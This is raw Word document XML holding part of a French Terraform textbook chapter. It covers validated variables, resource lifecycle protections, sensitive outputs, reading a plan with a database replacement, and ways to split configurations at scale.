      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Des variables validées · hcl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variables.tf</w:t>
        <w:br/>
        <w:t>variable "environnement" {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  description = "Nom de l'environnement (dev, staging, prod)"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  type        = string</w:t>
        <w:br/>
        <w:t xml:space="preserve">  validation {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    condition     = contains(["dev", "staging", "prod"], var.environnement)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    error_message = "Environnement invalide."</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>variable "instance_type" {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  type    = string</w:t>
        <w:br/>
        <w:t xml:space="preserve">  default = "t3.micro"</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une ressource protégée · hcl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main.tf</w:t>
        <w:br/>
        <w:t>resource "aws_instance" "app" {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ami           = data.aws_ami.ubuntu.id</w:t>
        <w:br/>
        <w:t xml:space="preserve">  instance_type = var.instance_type</w:t>
        <w:br/>
        <w:t xml:space="preserve">  subnet_id     = module.reseau.sous_reseau_prive_id</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  tags = {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Projet        = "demo"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Environnement = var.environnement</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  lifecycle {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    prevent_destroy = true</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ignore_changes  = [ami]</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux sorties, dont une sensible · hcl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outputs.tf</w:t>
        <w:br/>
        <w:t>output "adresse_publique" {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  description = "Adresse de l'instance applicative"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  value       = aws_instance.app.public_ip</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>output "mot_de_passe" {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  value     = aws_db_instance.main.password</w:t>
        <w:br/>
        <w:t xml:space="preserve">  sensitive = true</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.278 — Cinq éléments du langage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42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Élément</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="322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336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Piège</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2422"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3229"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Réutiliser un ensemble</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3363"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Version à épingler</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="242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data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="322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Lire l'existant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="336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Résultat qui varie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2422"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>locals</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3229"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Valeurs calculées</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3363"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Ne pas abuser des expressions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="242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depends_on</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="322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Forcer l'ordre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="336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Souvent inutile</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2422"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>lifecycle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3229"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Protéger une ressource</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3363"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Peut bloquer une suppression légitime</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>74.4 Lire un plan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le plan est le document le plus important de Terraform : il annonce ce qui sera créé, modifié ou détruit. Une destruction inattendue signale toujours un problème à comprendre avant d'appliquer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un plan avec remplacement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terraform plan -out=tfplan</w:t>
        <w:br/>
        <w:br/>
        <w:t># Plan: 2 to add, 1 to change, 0 to destroy.</w:t>
        <w:br/>
        <w:br/>
        <w:t>#  # aws_instance.app will be updated in-place</w:t>
        <w:br/>
        <w:t>#  ~ resource "aws_instance" "app" {</w:t>
        <w:br/>
        <w:t>#      ~ instance_type = "t3.micro" -&gt; "t3.small"</w:t>
        <w:br/>
        <w:t>#    }</w:t>
        <w:br/>
        <w:t>#</w:t>
        <w:br/>
        <w:t>#  # aws_db_instance.main must be replaced</w:t>
        <w:br/>
        <w:t># -/+ resource "aws_db_instance" "main" {</w:t>
        <w:br/>
        <w:t>#      ~ engine_version = "16.1" -&gt; "16.3" # forces replacement</w:t>
        <w:br/>
        <w:t>#    }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.279 — Cinq symboles du plan</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180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Symbole</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="374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Signification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="346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Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Création</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3467"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Vérifier le coût</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="374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Modification sur place</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="346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Sans interruption</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Destruction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3467"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Comprendre pourquoi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="374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Remplacement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="346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Vérifier la disponibilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;=</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Lecture de données</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3467"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Sans effet</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REMPLACEMENT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Destruction puis création d'une ressource, souvent déclenchée par un attribut immuable. Sur une base de données, cela signifie une perte si aucune protection n'est en place.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux protections et une procédure · hcl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Protéger une ressource critique</w:t>
        <w:br/>
        <w:t>resource "aws_db_instance" "main" {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  # ...</w:t>
        <w:br/>
        <w:t xml:space="preserve">  deletion_protection = true</w:t>
        <w:br/>
        <w:t xml:space="preserve">  lifecycle {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    prevent_destroy = true</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t># Supprimer réellement après décision explicite</w:t>
        <w:br/>
        <w:t># 1. Retirer `prevent_destroy`</w:t>
        <w:br/>
        <w:t># 2. Appliquer</w:t>
        <w:br/>
        <w:t># 3. Désactiver `deletion_protection`</w:t>
        <w:br/>
        <w:t># 4. Appliquer la suppression</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>74.5 Organiser à l'échelle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une configuration unique pour toute l'entreprise devient impossible à appliquer : le plan dure des heures et le risque augmente. Le découpage par cycle de vie est la solution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.280 — Quatre découpages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3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Découpage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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Avantage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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Inconvénient</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3314"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Par environnement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2916"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Isolation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2784"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Duplication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="331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Par couche (réseau, données, applicatif)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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Plans courts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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Dépendances entre états</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3314"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
